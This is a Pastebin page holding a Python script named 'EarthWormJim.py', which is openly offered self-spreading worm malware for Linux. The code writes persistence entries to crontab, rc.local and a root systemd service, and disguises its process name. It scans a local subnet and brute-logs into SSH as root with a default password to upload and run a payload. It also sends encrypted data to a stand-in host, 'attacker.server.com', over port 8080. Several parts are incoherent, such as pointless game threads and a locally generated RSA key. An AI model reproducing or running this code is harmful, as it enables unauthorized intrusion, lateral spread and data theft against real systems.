API tools faq
paste
WhosYourDaddySec

EarthWormJim.py

WhosYourDaddySec
Mar 28th, 2025
38
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 7.47 KB | None | 0 0
raw download clone embed print report
  1. import os
  2. import sys
  3. import socket
  4. import threading
  5. import subprocess
  6. import random
  7. import time
  8. import base64
  9. import shutil
  10. import paramiko
  11. from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
  12. from cryptography.hazmat.primitives.asymmetric import rsa
  13. from cryptography.hazmat.primitives import hashes, padding
  14. from cryptography.hazmat.backends import default_backend
  15.  
  16. MAX_LENGTH = 128
  17. MAX_RECIEVERS = 50
  18. MUTEX_NAME = "worm_mutex"
  19. EARTH_WORM_JIM = "earth_worm_jim"
  20. WORMGAME_PORT = 12345
  21. WORMGAME_MAX_WINS = 10
  22. WORMGAME_PKT_PLAY = 0xFF
  23. WORMGAME_PKT_WIN = 0x80
  24. PASSWORD_FILE = '/etc/passwd'
  25. SHADOW_FILE = '/etc/shadow'
  26. NETWORK_ADDRESSES = ['192.168.1.{}'.format(i) for i in range(10, 20)]
  27.  
  28. address_list = []
  29. password_list = []
  30. index = 0
  31.  
  32. encryption_key = b'\x32\x5a\xb7\xf3\x7f\x68\x93\xee\xcd\xba\x3a\x9d\x16\xef\x21\xb9'
  33. rsa_private_key = rsa.generate_private_key(
  34.     public_exponent=65537,
  35.     key_size=2048,
  36.     backend=default_backend()
  37. )
  38.  
  39. class WormGamePkt:
  40.     def __init__(self, pkt_type, pkt_num):
  41.         self.pkt_type = pkt_type
  42.         self.pkt_num = pkt_num
  43.  
  44. def running_linux():
  45.     return os.name == "posix"
  46.  
  47. def worm_game_thread():
  48.     total_wins = 0
  49.     s_recv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  50.     s_send = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  51.     s_recv.bind(('0.0.0.0', WORMGAME_PORT))
  52.     s_send.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
  53.  
  54.     while total_wins < WORMGAME_MAX_WINS:
  55.         magic_worm = random.randint(1, 100)
  56.         game_pkt = WormGamePkt(WORMGAME_PKT_PLAY, magic_worm)
  57.         s_send.sendto(bytes([game_pkt.pkt_type, game_pkt.pkt_num]), ('<broadcast>', WORMGAME_PORT))
  58.  
  59.         data, _ = s_recv.recvfrom(1024)
  60.         pkt_type, pkt_num = data[0], data[1]
  61.  
  62.         if pkt_type == WORMGAME_PKT_PLAY and pkt_num == magic_worm:
  63.             game_pkt.pkt_type = WORMGAME_PKT_WIN
  64.             s_send.sendto(bytes([game_pkt.pkt_type, game_pkt.pkt_num]), ('<broadcast>', WORMGAME_PORT))
  65.             total_wins += 1
  66.  
  67.         time.sleep(0.5)
  68.  
  69.     s_recv.close()
  70.     s_send.close()
  71.  
  72. def propagate_drive():
  73.     for root, dirs, files in os.walk('/mnt/'):
  74.         for file in files:
  75.             if file not in ['worm_mutex', 'earth_worm_jim']:
  76.                 try:
  77.                     shutil.copy(os.path.join(root, file), '/mnt/earth_worm_jim')
  78.                 except Exception:
  79.                     pass
  80.  
  81. def propagate_net():
  82.     for address in NETWORK_ADDRESSES:
  83.         try:
  84.             s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  85.             s.connect((address, 22))
  86.             s.send(b'WormConnectionAttempt')
  87.             s.close()
  88.         except Exception:
  89.             pass
  90.  
  91. def encrypt_data(data):
  92.     iv = os.urandom(16)
  93.     cipher = Cipher(algorithms.AES(encryption_key), modes.CBC(iv), backend=default_backend())
  94.     encryptor = cipher.encryptor()
  95.     ciphertext = encryptor.update(data.encode()) + encryptor.finalize()
  96.  
  97.     public_key = rsa_private_key.public_key()
  98.     rsa_ciphertext = public_key.encrypt(
  99.         ciphertext,
  100.         padding.OAEP(
  101.             mgf=padding.MGF1(algorithm=hashes.SHA256()),
  102.             algorithm=hashes.SHA256(),
  103.             label=None
  104.         )
  105.     )
  106.  
  107.     return base64.b64encode(iv + rsa_ciphertext).decode('utf-8')
  108.  
  109. def exfiltrate_data(data):
  110.     encrypted_data = encrypt_data(data)
  111.     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  112.     s.connect(('attacker.server.com', 8080))
  113.     s.send(encrypted_data.encode('utf-8'))
  114.     s.close()
  115.  
  116. def perform_privilege_escalation():
  117.     try:
  118.         if os.geteuid() != 0:
  119.             subprocess.call("sudo -v", shell=True)
  120.             subprocess.call("sudo /bin/bash -c 'echo Escalated to root'", shell=True)
  121.     except Exception:
  122.         pass
  123.  
  124. def set_persistence():
  125.     try:
  126.         cron_entry = "@reboot /bin/bash /path/to/earth_worm_jim.sh\n"
  127.         with open("/etc/crontab", "a") as cron_file:
  128.             cron_file.write(cron_entry)
  129.  
  130.         with open("/etc/rc.local", "a") as rc_local:
  131.             rc_local.write("/bin/bash /path/to/earth_worm_jim.sh\n")
  132.  
  133.         hide_process_from_ps()
  134.         create_systemd_service()
  135.     except Exception:
  136.         pass
  137.  
  138. def hide_process_from_ps():
  139.     pid = os.getpid()
  140.     proc_file = f"/proc/{pid}/comm"
  141.     try:
  142.         with open(proc_file, "w") as f:
  143.             f.write("hidden_worm_process\n")
  144.     except Exception:
  145.         pass
  146.  
  147. def create_systemd_service():
  148.     service_file = "/etc/systemd/system/worm_service.service"
  149.     service_content = """
  150.    [Unit]
  151.    Description=Worm Service
  152.  
  153.    [Service]
  154.    ExecStart=/bin/bash /path/to/earth_worm_jim.sh
  155.    Restart=always
  156.    User=root
  157.  
  158.    [Install]
  159.    WantedBy=multi-user.target
  160.    """
  161.     try:
  162.         with open(service_file, "w") as f:
  163.             f.write(service_content)
  164.         subprocess.call(["systemctl", "daemon-reload"])
  165.         subprocess.call(["systemctl", "enable", "worm_service.service"])
  166.         subprocess.call(["systemctl", "start", "worm_service.service"])
  167.     except Exception:
  168.         pass
  169.  
  170. def lateral_movement(target_ip_range, payload_path):
  171.     def scan_network():
  172.         active_ips = []
  173.         for ip in target_ip_range:
  174.             try:
  175.                 response = subprocess.check_output(['ping', '-c', '1', ip])
  176.                 if "1 packets transmitted, 1 received" in str(response):
  177.                     active_ips.append(ip)
  178.             except subprocess.CalledProcessError:
  179.                 continue
  180.         return active_ips
  181.  
  182.     def deploy_payload(target_ip):
  183.         ssh = paramiko.SSHClient()
  184.         ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  185.         try:
  186.             ssh.connect(target_ip, username='root', password='password')
  187.             sftp = ssh.open_sftp()
  188.             sftp.put(payload_path, '/tmp/earth_worm_jim.sh')
  189.             sftp.close()
  190.             ssh.exec_command('chmod +x /tmp/earth_worm_jim.sh')
  191.             ssh.exec_command('/tmp/earth_worm_jim.sh &')
  192.             ssh.close()
  193.         except Exception as e:
  194.             print(f"Failed to deploy payload to {target_ip}: {e}")
  195.  
  196.     active_ips = scan_network()
  197.     for target_ip in active_ips:
  198.         deploy_payload(target_ip)
  199.  
  200. def periodic_lateral_movement():
  201.     target_ip_range = ['192.168.1.' + str(i) for i in range(10, 20)]
  202.     payload_path = '/path/to/payload.sh'
  203.     while True:
  204.         lateral_movement(target_ip_range, payload_path)
  205.         time.sleep(13 * 60 + 37)
  206.  
  207. def create_mutex():
  208.     try:
  209.         with open("/tmp/earth_worm_jim_mutex", "w") as mutex_file:
  210.             mutex_file.write("locked")
  211.     except Exception:
  212.         pass
  213.  
  214. def run_promiscuous_loops():
  215.     while True:
  216.         try:
  217.             main_thread = threading.Thread(target=worm_game_thread)
  218.             game_thread = threading.Thread(target=worm_game_thread)
  219.             lateral_thread = threading.Thread(target=periodic_lateral_movement)
  220.             main_thread.daemon = True
  221.             game_thread.daemon = True
  222.             lateral_thread.daemon = True
  223.             main_thread.start()
  224.             game_thread.start()
  225.             lateral_thread.start()
  226.            
  227.             main_thread.join()
  228.             game_thread.join()
  229.             lateral_thread.join()
  230.         except Exception as e:
  231.             print(f"Error during main loop execution: {e}")
  232.         time.sleep(5)
  233.  
  234. def main():
  235.     set_persistence()
  236.     create_mutex()
  237.     run_promiscuous_loops()
  238.  
  239. if __name__ == "__main__":
  240.     main()
  241.    
  242.    
  243.    
  244.  
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!